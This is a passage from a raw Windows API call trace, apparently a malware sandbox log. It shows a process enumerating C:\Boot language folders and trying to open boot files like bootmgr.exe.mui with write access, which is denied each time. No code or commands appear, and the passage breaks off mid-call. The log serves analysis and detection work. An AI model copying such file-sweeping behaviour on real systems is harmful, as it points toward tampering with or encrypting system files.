(HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0070.035] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0070.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0070.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0070.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0070.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0070.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0070.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0070.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0070.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0070.036] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.036] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.036] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.036] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0070.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0070.036] AreFileApisANSI () returned 1 [0070.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\hu-HU\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\hu-HU\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0070.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0070.036] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.036] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0070.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0070.036] AreFileApisANSI () returned 1 [0070.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53640 [0070.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\hu-HU\\memtest.exe.mui") returned 30 [0070.036] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\memtest.exe.mui" (normalized: "c:\\boot\\hu-hu\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0070.037] GetFileType (hFile=0x41c) returned 0x1 [0070.037] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0070.037] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0070.037] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0070.037] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0070.037] CloseHandle (hObject=0x41c) returned 1 [0070.037] AreFileApisANSI () returned 1 [0070.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.037] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53838 [0070.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x53838, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\hu-HU\\memtest.exe.mui") returned 30 [0070.038] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\memtest.exe.mui" (normalized: "c:\\boot\\hu-hu\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.038] GetLastError () returned 0x5 [0070.038] GetLastError () returned 0x5 [0070.038] SetLastError (dwErrCode=0x5) [0070.038] GetLastError () returned 0x5 [0070.038] SetLastError (dwErrCode=0x5) [0070.038] GetLastError () returned 0x5 [0070.038] SetLastError (dwErrCode=0x5) [0070.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0070.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0070.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0070.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0070.038] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.038] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.038] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x693f8, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓뎘")) returned 0 [0070.038] FindClose (in: hFindFile=0x77fd0 | out: hFindFile=0x77fd0) returned 1 [0070.038] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0070.038] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0070.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0070.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0070.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0070.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0070.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0070.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x465f8 | out: hHeap=0x20000) returned 1 [0070.038] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0070.038] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0070.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0070.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.039] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0070.039] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.039] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.039] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.039] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.039] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.039] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.039] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.039] AreFileApisANSI () returned 1 [0070.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\it-IT", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\it-IT", lpUsedDefaultChar=0x0) returned 14 [0070.039] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.039] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0070.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0070.039] AreFileApisANSI () returned 1 [0070.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0070.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88400 [0070.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88400, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\it-IT") returned 14 [0070.039] CreateFileW (lpFileName="C:\\Boot\\it-IT" (normalized: "c:\\boot\\it-it"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.039] GetLastError () returned 0x5 [0070.039] GetLastError () returned 0x5 [0070.039] SetLastError (dwErrCode=0x5) [0070.039] GetLastError () returned 0x5 [0070.039] SetLastError (dwErrCode=0x5) [0070.040] GetLastError () returned 0x5 [0070.040] SetLastError (dwErrCode=0x5) [0070.040] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.040] AreFileApisANSI () returned 1 [0070.040] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0070.040] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88770 [0070.040] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88770, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\it-IT") returned 14 [0070.040] CreateFileW (lpFileName="C:\\Boot\\it-IT" (normalized: "c:\\boot\\it-it"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.040] GetLastError () returned 0x5 [0070.040] GetLastError () returned 0x5 [0070.040] SetLastError (dwErrCode=0x5) [0070.040] GetLastError () returned 0x5 [0070.040] SetLastError (dwErrCode=0x5) [0070.040] GetLastError () returned 0x5 [0070.040] SetLastError (dwErrCode=0x5) [0070.040] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0070.040] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0070.040] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0070.040] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.040] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.040] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.040] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.040] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.040] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.040] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.040] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010d0c0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ed6c6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0070.040] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0070.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0070.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.041] FindFirstFileExW (in: lpFileName="C:\\Boot\\it-IT\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x781d0 [0070.041] FindNextFileW (in: hFindFile=0x781d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010ccad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5d8ab4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.041] FindNextFileW (in: hFindFile=0x781d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d58, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0070.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0070.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0070.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0070.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46208 [0070.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0070.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0070.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0070.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0070.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0070.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0070.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0070.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0070.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0070.042] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.042] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.042] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.042] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0070.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.042] AreFileApisANSI () returned 1 [0070.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\it-IT\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\it-IT\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0070.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0070.042] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.042] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0070.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0070.042] AreFileApisANSI () returned 1 [0070.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88770, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53718 [0070.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88770, cbMultiByte=-1, lpWideCharStr=0x53718, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 30 [0070.042] CreateFileW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0070.042] GetFileType (hFile=0x41c) returned 0x1 [0070.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0070.043] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0070.043] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0070.043] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0070.043] CloseHandle (hObject=0x41c) returned 1 [0070.043] AreFileApisANSI () returned 1 [0070.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88770, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53640 [0070.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88770, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 30 [0070.043] CreateFileW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.043] GetLastError () returned 0x5 [0070.043] GetLastError () returned 0x5 [0070.043] SetLastError (dwErrCode=0x5) [0070.044] GetLastError () returned 0x5 [0070.044] SetLastError (dwErrCode=0x5) [0070.044] GetLastError () returned 0x5 [0070.044] SetLastError (dwErrCode=0x5) [0070.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0070.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0070.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0070.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0070.044] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.044] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.044] FindNextFileW (in: hFindFile=0x781d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5d8ab4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf30285aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0070.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0070.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.044] RtlAllocateHeap 